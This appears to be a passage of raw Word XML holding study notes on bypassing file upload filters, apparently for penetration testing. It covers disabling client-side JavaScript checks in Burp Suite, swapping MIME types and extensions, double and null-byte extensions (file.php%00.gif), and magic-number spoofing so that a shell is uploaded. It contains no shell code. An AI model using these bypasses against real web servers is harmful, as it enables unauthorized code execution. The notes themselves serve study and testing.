    <w:p w14:paraId="0ACBF2FA" w14:textId="761E659E" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="00AD0D9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept successful upload using Burp or console to see parameters being used in the upload to be slotted in above command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D4A4D" w14:textId="78B74F8C" w:rsidR="00AD0D9A" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search source code for JS function used for content filtering client-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B73A9F1" w14:textId="4EC6474B" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Whitelisting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>using !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>= check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9F6FE" w14:textId="73440A4E" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attempt file upload to confirm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144C41C2" w14:textId="655A626D" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and reload page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577ED98C" w14:textId="767A4E47" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Find servers response </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> right click intercepted data &gt; “Do Intercept” &gt; “Response to this Request”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19FCD8" w14:textId="1071C668" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D550F4" w14:textId="083D2D72" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>View server’s response to this request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E052317" w14:textId="6D369BCA" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Delete, comment out, break JS function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3F538B" w14:textId="62C1E366" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433DAE59" w14:textId="2980AEE6" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> will not intercept any external JS files that the web page is loading by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C28752" w14:textId="63192EEA" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To edit script outside main page being loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5829B9DF" w14:textId="19463F66" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="001D496F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Options &gt; Intercept Client Requests &gt; edit condition of the first line to remove “^</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>$|”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FAF33D" w14:textId="559A9165" w:rsidR="001D496F" w:rsidRPr="0084205E" w:rsidRDefault="00333751" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload reverse shell with incorrect extension, such as .jpeg, intercept upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8C482" w14:textId="4FE71BDD" w:rsidR="00333751" w:rsidRPr="0084205E" w:rsidRDefault="00333751" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Change Content-Type: image/jpeg </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> text/x-php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7024CFAA" w14:textId="5AC8297E" w:rsidR="00333751" w:rsidRPr="0084205E" w:rsidRDefault="00333751" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Change file extension from .jpeg to .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC9A78" w14:textId="5A8724D9" w:rsidR="00333751" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00333751" w:rsidRPr="0084205E">
        <w:t>orward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C55CE" w14:textId="246D7602" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypassing Server-Side Filtering: File Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655017F" w14:textId="0D1FA101" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Perform testing to conceive idea of what is or is not allowed through the filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11706694" w14:textId="13DE2FBB" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gradually construct payload which conforms to restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9DB3F" w14:textId="7B726D80" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypasses are dependent on blacklists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDFB305" w14:textId="7B238676" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Searching for last period to find extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEA4BD7" w14:textId="4EB31B16" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>First period in filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482305C4" w14:textId="429CEF19" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Splitting filename at each period and checking to see if any blacklisted extensions show up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198D6BB3" w14:textId="1A971256" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Extension filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A72CDC" w14:textId="6DC6EF84" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Certain extensions have alternates that serve the same function and can bypass filter, however webpage may not be configured to read these extensions properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF8E59" w14:textId="3260478D" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start legitimate and work inward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5BE1F" w14:textId="7A1D5B98" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Try to find extensions that can be executed and are not filtered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366938B" w14:textId="6D1F775F" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Try using combo extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B335FCF" w14:textId="66E1BA3F" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. if jpg is OK but php is not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB2E81D" w14:textId="51AF1B3A" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>File.jpg.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45B46EBD" w14:textId="2B28CDFE" w:rsidR="00AA71FA" w:rsidRPr="0084205E" w:rsidRDefault="00AA71FA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Null byte </w:t>
      </w:r>
      <w:r w:rsidR="006536CE" w:rsidRPr="0084205E">
        <w:t>(file.php</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>%00.gif</w:t>
      </w:r>
      <w:r w:rsidR="006536CE" w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57734D88" w14:textId="1CA469CD" w:rsidR="00666B25" w:rsidRPr="0084205E" w:rsidRDefault="00666B25" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Php5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704CD891" w14:textId="3EC60232" w:rsidR="007844CB" w:rsidRPr="0084205E" w:rsidRDefault="007844CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filter may search for first period only and defer to using the jpg portion to OK upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F1393" w14:textId="1494E7F8" w:rsidR="000D5C50" w:rsidRPr="0084205E" w:rsidRDefault="000D5C50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerate and see what is allowed and what is blocked and craft payload which can pass criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93DA07" w14:textId="4BE6B315" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypassing Server-Side Filtering: Magic Numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C711C7F" w14:textId="78E30D78" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Effective against PHP but can fail against other types of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webserver</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3988B253" w14:textId="334E94E6" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Adding magic number of a known OK file to top of shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B30F79" w14:textId="715C22ED" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>List of signatures on Wikipedia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C9578A" w14:textId="1FA1B661" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use “file” command to check file type of shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE6C40" w14:textId="67AF7C9A" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PHP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C1821" w14:textId="0C388F4C" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Open file to write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DE0AFB" w14:textId="68F5D9D3" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Add four random letters on first line (AAAA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB25ECD" w14:textId="3851681C" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Save and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613C51A" w14:textId="172342AA" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Reopen file in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
